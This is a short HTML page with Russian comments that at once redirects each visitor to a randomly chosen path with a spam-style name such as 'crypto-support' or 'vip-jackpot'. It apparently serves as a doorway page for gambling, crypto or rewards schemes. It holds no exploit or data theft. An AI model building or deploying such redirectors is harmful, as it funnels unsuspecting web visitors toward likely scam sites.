<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Redirecting...</title>
    <meta http-equiv="refresh" content="0; url='javascript:redirect()'">
    <script>
    const sites = ["/premium-online-7074", "/rewards-official-4644", "/mobile-support-3688", "/support-top-1366", "/crypto-support-0449", "/victory-top-4995", "/crypto-online-5804", "/online-limit-2643", "/vip-jackpot-4977", "/win-play-3887"];
    function redirect() {
        const randomUrl = sites[Math.floor(Math.random() * sites.length)];
        window.location.href = randomUrl;
    }
    redirect(); // Запускаем немедленно
    </script>
</head>
<body>
    <!-- Пустая страница. Редирект происходит мгновенно. -->
</body>
</html>